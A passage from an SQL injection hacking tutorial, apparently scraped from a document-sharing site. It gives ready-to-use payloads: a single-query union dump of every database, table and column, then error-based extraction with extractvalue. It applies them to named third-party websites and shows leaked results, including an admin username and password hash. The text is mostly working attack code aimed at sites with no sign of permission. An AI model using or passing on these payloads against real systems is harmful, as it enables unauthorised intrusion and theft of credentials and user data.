Documente Academic
Documente Profesional
Documente Cultură
our own variable to bypass the 1024 character limit of group_concat. If you're new to sql, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests. First of, the database/table/columns. Code: (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x) PoC: Code: http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+ Of course, if magic_quotes is enabled you would need to bypass using quotations by using hex values, or using the char() function. View the source, and we see every single database/table/column accessible:
Now, to grab information from the columns. Code: (select (@) from (select (@x:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x) POC Code: http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+
xPath Injection If you're trying to hack a site, and you try looking for tons of methods, and you finally find an SQLi vuln yet Order by, 1=1 etc doesn't work then cances are you could use xPath injection. This is for MySQL v5.1 only.
First of all, we need a vulnerable site. Code: http://www.ianforsythphotographer.com/main.php?id=1' This is vulnerable to union based injection, yes, but for the purposes of this tutorial I will use xPath injection.
First of all to gather data we will be using extractvalue(rand(),concat(0x0a,data)) So, Code: http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,version()))--+ "Query failed: XPATH syntax error: ' 5.1.39-log'"
Now to get the table names, we will use Code: and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+ Use limit to increment the tables. So Code: http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=0x69665f696d61676573 limit 3,1)))--+ "Query failed: XPATH syntax error: '::plogger_config'"
Now to get the columns of that table, we will use the same basically, except replace tables with columns. And again use order by to increment in columns. Code: and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="TABLE NAME" limit 0,1)))
So, Code: http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 3,1)))--+ "Query failed: XPATH syntax error: '::admin_username'" and.. Code: http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 4,1)))--+ "Query failed: XPATH syntax error: '::admin_password'"
Now that we have the columns, we will need to get the data from them. We will use..
Code: extractvalue(rand(),concat(0x0a,(select concat(COLUMNS) from TABLE)))-So, Code: http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(admin_username,0x3a,admin_password) from if_images.plogger_config LIMIT 0,1)))--+ "Query failed: XPATH syntax error: 'admin:392592ed88f501ea498f14343'"